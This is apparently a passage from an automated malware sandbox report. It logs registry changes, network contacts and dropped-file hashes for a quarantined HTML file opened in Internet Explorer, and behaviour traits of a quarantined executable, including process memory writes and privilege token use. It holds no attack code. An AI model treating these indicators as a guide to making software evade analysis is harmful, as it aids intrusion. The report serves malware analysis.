Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000035270b48ffd339449e8f5ccf493e442b0000000002000000000010660000000100002000000094d987120c6896d8c062d8158b3a8227578fe5620e5973003b6c221cdbf269c2000000000e8000000002000020000000d8441a2eac2613efa649ad32498b145c1af05d9d376c9cb5c052ce9ed90b12039000000031051a890e942721d7337c1363b75e0919df42ec9da746cf1a8f46ae61ab3cb59449a3670a29f98f5f57a5e963607fec50f28c1c28a918f5c6d7a03d3d6305d21019140465b277102ed5173019037a0706a2cd093b49eb5bd705ec67ab7c951dad814437875c0295e967273e5b2507f6301679e2082852770a238199fe443de8e00785a60d0e9f94cb334bf3bfb5043840000000b74b126ebe2c2acd66596bc9dc360467d64c214549694f73e3ebdf5502b6ab17d692d1a7155b6508433c708ef99c5fa5774906e7637d5f019066609762e46e50 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D8BC3541-F49B-11EF-AA78-72B5DC1A84E6} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000035270b48ffd339449e8f5ccf493e442b000000000200000000001066000000010000200000005494776ae6b6d78ba0e85cdca878f108b3e7f6d1ab68c7e3fad535255006bf16000000000e80000000020000200000003c0f7d067f638c46ec0fafd2a5dbbadef3d874e03175139b889da58efc9ca727200000009bb25def5f37b0c8ee88fad080efc0195f89721b5cbf672d8a3094981eb9318640000000bc6801cfb6b14bc6c6ee10a6ef12cb0e0bb3bc1de469a6f28d1bc4c2e73277f8177676c003b7072198c525f09a4c51532414289f3332f0fd2e1d4a6fc38448e7 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446775436" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 10e887ada888db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\ssystemfiktums.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2248 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabE209.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\CabE335.tmp

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\TarE367.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 af27d2f9df3678a4820cae983fd054ee
SHA1 4954e871c28f1a358ca746c2999dedea81cc3d7a
SHA256 36d99725d5edbc472efd099ee38b00a721cc4b6b161e392c384051034660dcb1
SHA512 9d2d1ba10114aed3e8b90aa6ecba4fcd5640ac8006bfa093ae4037b0ead27b5af35ec0c13870ebcf9851a3f661f1dfdc7dfcf0aa3be14ad82da9497356a7f9d5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1626debce27357e2a9c128e1ede077d7
SHA1 f44fe2184a9febcc5e48d33ea525f5a307f055bb
SHA256 7aab5e3fe1a10319cdb16eff72092051e61dfc5e6105d92ef5c093e9d8a8b114
SHA512 8f575cffdab1eda950774881d7be7340576f2d650f4119a93c587654c15efeee7abae2761159379253656dbb05c21c2540653679bf6a25f3d7343a20e277341e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 04979bae5ed79e345ee2b2d5fe24763a
SHA1 76ae372f268ecf539089ba5833f9b321cc4e216c
SHA256 b8d7c4fab21959835f7ee666af13e64b086e6e9ed1d5fbd397f9a6b01749b05f
SHA512 87c74ac7acf1994fe16f9dd31f3b600ccb5e1c7ab18aecdc7d42421ebc43146d282d2896e34c8ada469c141c855c180aa922d7ff1b68f32843a22f8dd8901e70

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a20d03a3a8d5eb5b5f2036a30957b356
SHA1 618f20e799fcdd921d7b0e0c65375b61fa5014d7
SHA256 e793adba3f15535b187e395fab3024ce7360a5eb0394259985f3ddde2ee04cf0
SHA512 0f983971341ffbcbcb02116328639800903ed4b68885978b02e02d98fa729bc69a3f58a06191dc9b1402f10f6eee874cb7b1ac798206faae0eccc0993f0a00d6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4b84ddc8bc55c5577399edd356b15f2b
SHA1 d925819d63116019ca9efd76cbae1ff4c79c71b0
SHA256 4839436b092e7f9a369807e9d26dab013553b4046f41a25993403d51a9276ea9
SHA512 e08ec034db6cad5d7b0840b95382f4fb87d7afff472640c198a023b0ef321ef85b8b5de09415cbb252295bd40a5eaa5dc272357be2b1f8580a36e132a38bfa71

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 155e802f0f17ad875a120dfbef9e6941
SHA1 ec08af33b727043468487031d12df2729befd4ab
SHA256 bdaa4204ff2013d195e38460b6b91fd57d7cabda8877eae820bdca3cab8459e1
SHA512 e43307d16595d8fab394564f262174f69d7de9c2a16afa78a079fdc70e635af7280dc1acdb496ec956c2f31639ee8551136b4c873684afa072fe11defc8a343a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 39836d853352b5997bf3986e741d236b
SHA1 94b4ae9e3c63bb1da16df5705954822ba1382e93
SHA256 fa18bbeaa7175cf069a3bfdf1cd369f4195c81380e86f4bb82974f8b96618f6a
SHA512 253e771c0ea433aecdaf70073f7080553f8a7293e0116fcd60087302e8fc9e034d6dd9773f0654e59dbf9d473e4a885f0cb7c0cdd2c4489c0718c75acc9dc6e2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 21230c0a0b8286029ed5016f36859ca2
SHA1 ebc9d3c81af17d48b4a88f531753f14e9f0963ea
SHA256 a44e288e1126d6bb336c31c6095d57f021dec56fcf9e4056e571542fe14b024c
SHA512 763641184796f59436f83d96bcab5e9df3fc21d16d5520c1b9b0b2924a7761672a029fdd70acc7e6a4ffd0c4a18ab1d9e1e94a6d285911a2385a5760f501aabc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 61f7818466581fae52b046e8d272d0b0
SHA1 f8cde54a804f4c6c1658d72f8cc9b47da4ceb151
SHA256 6e2998d0b446106a8021fa8009c20f1a93180116f87637630ceaa768c7b8373d
SHA512 25605d8d99b1507ee03052735d63338d2f21064256120d10b16116b66003a6610140807cf1ba9c3f71aa915e28cb9a6a14484f287168e50a18489e296ee7d3e4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8183edae9f5d236da5226500389aac5a
SHA1 2a66fa0fec58d7612f51c5664f435ad128d68a18
SHA256 c20cac60da9d3d5775a2cc06b2340715fe401cabe83ad185478bfd00488a97ac
SHA512 ddc68d109291beff62dbbd6d6802e16a0cba47d4f4c49a09f35e90712b8ed30c749f0fbc794e7c49bdfa495f9e4f4f3ba38956a74da3d423426aed564eb86e1b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d25e50655ae9315eaa6ab85d260312cf
SHA1 045f465f7cefafec903415041f685c70894d431a
SHA256 5d01c2335748320ab11009696985387406ef4bb6c9882b49d6c716860d16bb9e
SHA512 5e14571e0b9a0df21a7df16aee4e705a6e57d8af2a5b6943f0ddc15679e24f9eab5f5690c05d4243c6864ca10e831bbe682a89a163333fc94ed1aa516cca4e36

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4fef32d0239e28540cb8e9f2d90cf413
SHA1 45391101375cf93465ed3994a25c0244908ff716
SHA256 f809c4667f821907f20e185b5531a97a2a61b4e11d51e8055c21827fce1d5d9c
SHA512 794dadec39bae5b1feab07a71656c070dd933cd6c6c7db9e2812e41b621b5a06de0578053c55477543ae64b0a18b6cb18ca81aade595e0390f7659854bbb73ea

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 24d0c04cd7f5bfee2df98944f126d808
SHA1 e168065ff2d043c4bc63b3158c18c1f1c0494890
SHA256 e9228e8ebb9061181d28760012ce318cbfe53a3c189d0a20b68d9f22387a4dae
SHA512 43bd7cec03827d8f670693b4ee5867a66cb16bd3e5faa22a6fd217248a8f85cc51e729f53d55f9c2e66db81d3768916a0a8911e092c8c61f1e0919902b161de1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6dc121c59db96555a4ab816f096e2e06
SHA1 86d7d7a1f0e5faf507fdb005661f23b173e27b25
SHA256 2aefd77dc01a196059f7028576ea1f68a7a480e65d7ef3ff233434c8dd129a96
SHA512 6a6aa2de419f00b9730f452f719fbfed3a0fadf854af2aa87857d7d522e8022b62524e6b7e194799dc4a009d62bca3906c03e655f5b98840d5440c26e982aa49

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 499806a15f8932bf216d866aa01fe07f
SHA1 fa4ce5cb135920f8be10ab97fa4b5828d64ffd0d
SHA256 a9730dad899b06b8c50660010e7136db875dfcf6db6e160d202c3a11ee3a8f68
SHA512 406a9a689c1adb6d73b3f0bad2f2731c6e5a5eed58faf17db50d790b685c352d492b5ea6499c96a4e89e246a0a1b7e01251fea8ca2bd8154c0c579994d79cc77

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c4235fb93ff00fb852f6f48d0c17f9a5
SHA1 5e462d9bbfbb1dc4b6108c33b16f18805d67830b
SHA256 6fa5de1cd5355914db0ef93b43692d9bdf4857b4f68cbaedae72c289b5547f4f
SHA512 4e09e8fe13502a32f0a0181e77a0b8cdb2aa1cdac0bca22f89821728af2599cc8bab50286759eb6411b41787a1aee603d9668dcb4d4069db9d2ffa441c9a49c1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4c764bfc0bf48cd349a44ce8aa4955aa
SHA1 daed7aa4dbb510d228152de25ca9208fd1e4004e
SHA256 2203ee5c7d32ec0e9754b55a08513b1888f39d267901b470e7987ab9c48b390a
SHA512 45d008d63b346a3370309907856340137b8ec298ce6e7f8040b8a4e8941627955d8663575b9ff688f55594a45a5af41026adf68ab6b3038ba6f96b16268aab31

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d9ef138295b39081a48a80e1abc2d7f0
SHA1 253d40f381248805ad9817f6c12ef4a4c9db2920
SHA256 67623ac28eb81f6db0bba22710b1a8410c164514af4e23d31299405951e30fb0
SHA512 bb43c6b8eb543ef78b557eab0506f0038aea135a0a9e59582ae40e210fc634b2f3c3f2a1a1d302f958d9e72d257d353f1b347fc37b3823fbd1ec82eda5b7a5e6

Analysis: behavioral6

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

Signatures

Program crash

Description Indicator Process Target
N/A N/A N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags N/A N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust N/A N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings\MuiCache N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateGlobalPrivilege N/A N/A N/A
Token: SeChangeNotifyPrivilege N/A N/A N/A
Token: 33 N/A N/A N/A
Token: SeIncBasePriorityPrivilege N/A N/A N/A
Token: SeCreateGlobalPrivilege N/A N/A N/A
Token: SeChangeNotifyPrivilege N/A N/A N/A
Token: 33 N/A N/A N/A
Token: SeIncBasePriorityPrivilege N/A N/A N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1828 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3384 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3384 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3384 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
